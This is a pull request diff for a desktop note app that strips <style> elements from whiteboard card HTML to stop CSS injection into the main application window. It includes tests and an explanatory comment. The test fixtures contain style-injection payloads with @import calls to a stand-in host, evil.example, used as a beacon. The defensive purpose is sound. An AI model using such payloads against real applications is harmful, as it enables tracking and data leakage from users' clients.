### PR TITLE
Desktop: Strip style elements from whiteboard card content

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -318,6 +318,8 @@ packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/GroupNode.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/LinkNode.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/TextNode.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/handlePositions.js
+packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.test.js
+packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/useCardWheel.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/useCheckboxToggle.test.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/useCheckboxToggle.js

--- a/.ignore.eslint
+++ b/.ignore.eslint
@@ -343,6 +343,8 @@ packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/GroupNode.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/LinkNode.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/TextNode.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/handlePositions.js
+packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.test.js
+packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/useCardWheel.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/useCheckboxToggle.test.js
 packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/useCheckboxToggle.js

--- a/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/FileNode.tsx
+++ b/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/FileNode.tsx
@@ -20,6 +20,7 @@ import { WhiteboardNodeData } from '../canvasFlow';
 import useCheckboxToggle from '../useCheckboxToggle';
 import handlePositions from './handlePositions';
 import useCardWheel from './useCardWheel';
+import stripUnsafeStyles from './stripUnsafeStyles';
 
 const logger = Logger.create('WhiteboardFileNode');
 
@@ -124,7 +125,7 @@ const FileNode = ({ data, selected }: NodeProps<{ id: string; type: 'wbFile'; da
 				const result = await ctx.markupToHtml(MarkupLanguage.Markdown, resolved.body, {
 					resourceInfos: linkedResources,
 				});
-				if (!cancelled) setNoteHtml(result?.html ?? '');
+				if (!cancelled) setNoteHtml(stripUnsafeStyles(result?.html ?? ''));
 			} catch {
 				if (!cancelled) setNoteHtml('');
 			}

--- a/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/TextNode.tsx
+++ b/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/TextNode.tsx
@@ -11,6 +11,7 @@ import { WhiteboardNodeData } from '../canvasFlow';
 import useCheckboxToggle from '../useCheckboxToggle';
 import handlePositions from './handlePositions';
 import useCardWheel from './useCardWheel';
+import stripUnsafeStyles from './stripUnsafeStyles';
 
 const useRenderedMarkdown = (md: string, ctx: WhiteboardContextValue) => {
 	const [html, setHtml] = useState<string>('');
@@ -26,7 +27,7 @@ const useRenderedMarkdown = (md: string, ctx: WhiteboardContextValue) => {
 				const result = await ctx.markupToHtml(MarkupLanguage.Markdown, md, {
 					resourceInfos: ctx.resourceInfos,
 				});
-				if (!cancelled) setHtml(result?.html ?? '');
+				if (!cancelled) setHtml(stripUnsafeStyles(result?.html ?? ''));
 			} catch {
 				if (!cancelled) setHtml('');
 			}

--- a/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.test.ts
+++ b/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.test.ts
@@ -19,6 +19,16 @@ describe('stripUnsafeStyles', () => {
 			'<p>x</p>',
 		],
 		[
+			'removes an uppercase STYLE element',
+			'<P>x</P><STYLE>@import url(http://evil.example/x.css);</STYLE>',
+			'<p>x</p>',
+		],
+		[
+			'removes a mixed-case Style element',
+			'<Style>a{}</Style><p>y</p>',
+			'<p>y</p>',
+		],
+		[
 			'keeps rich card content (images, formatting, links)',
 			'<p><strong>Bold</strong> <a href="https://example.com">link</a> <img src="x.png"></p>',
 			'<p><strong>Bold</strong> <a href="https://example.com">link</a> <img src="x.png"></p>',

--- a/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.test.ts
+++ b/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.test.ts
@@ -1,0 +1,38 @@
+import stripUnsafeStyles from './stripUnsafeStyles';
+
+describe('stripUnsafeStyles', () => {
+
+	test.each([
+		[
+			'removes a style element',
+			'<p>Hello</p><style>.rli-sideBar { outline: 3px solid magenta; }</style>',
+			'<p>Hello</p>',
+		],
+		[
+			'removes a style element containing a remote @import',
+			'<style>@import url(http://evil.example/beacon.css);</style><p>Hi</p>',
+			'<p>Hi</p>',
+		],
+		[
+			'removes multiple style elements',
+			'<style>a{}</style><p>x</p><style>b{}</style>',
+			'<p>x</p>',
+		],
+		[
+			'keeps rich card content (images, formatting, links)',
+			'<p><strong>Bold</strong> <a href="https://example.com">link</a> <img src="x.png"></p>',
+			'<p><strong>Bold</strong> <a href="https://example.com">link</a> <img src="x.png"></p>',
+		],
+		[
+			'keeps inline style attributes, which cannot reach the app chrome',
+			'<p style="color: red">text</p>',
+			'<p style="color: red">text</p>',
+		],
+	])('should %s', (_label, input, expected) => {
+		expect(stripUnsafeStyles(input)).toBe(expected);
+	});
+
+	test('should return empty input unchanged', () => {
+		expect(stripUnsafeStyles('')).toBe('');
+	});
+});

--- a/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.ts
+++ b/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.ts
@@ -1,10 +1,9 @@
-// Whiteboard cards inject their rendered HTML into the main application
-// document, not the isolated note-viewer iframe, so a <style> in the note would
-// apply to and exfiltrate from the app chrome. Removing <style> elements also
-// drops any @import (only valid inside a stylesheet); inline style="" attributes
-// are kept as they can only style the card itself.
+// Whiteboard cards render into the main document, not the isolated note-viewer
+// iframe, so a note's <style> would reach the app chrome. Removing <style>
+// elements also drops any @import; inline style="" attributes are kept as they
+// only affect the card itself.
 const stripUnsafeStyles = (html: string) => {
-	if (!html || !html.includes('<style')) return html;
+	if (!html || !/<style/i.test(html)) return html;
 
 	const doc = new DOMParser().parseFromString(html, 'text/html');
 	for (const style of Array.from(doc.querySelectorAll('style'))) {

--- a/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.ts
+++ b/packages/app-desktop/gui/NoteEditor/NoteBody/WhiteboardEditor/nodes/stripUnsafeStyles.ts
@@ -1,0 +1,16 @@
+// Whiteboard cards inject their rendered HTML into the main application
+// document, not the isolated note-viewer iframe, so a <style> in the note would
+// apply to and exfiltrate from the app chrome. Removing <style> elements also
+// drops any @import (only valid inside a stylesheet); inline style="" attributes
+// are kept as they can only style the card itself.
+const stripUnsafeStyles = (html: string) => {
+	if (!html || !html.includes('<style')) return html;
+
+	const doc = new DOMParser().parseFromString(html, 'text/html');
+	for (const style of Array.from(doc.querySelectorAll('style'))) {
+		style.remove();
+	}
+	return doc.body.innerHTML;
+};
+
+export default stripUnsafeStyles;


### PR DESCRIPTION
Whiteboard text and file cards render note content with the full markup renderer and inject it into the main application document rather than the isolated note-viewer iframe. As a result, a `<style>` block in the note could affect styling outside the card.

Strip `<style>` elements from the rendered HTML before injecting it. Inline `style` attributes and all other rich content (images, formatting, links) are preserved, so cards render as before. Includes a test.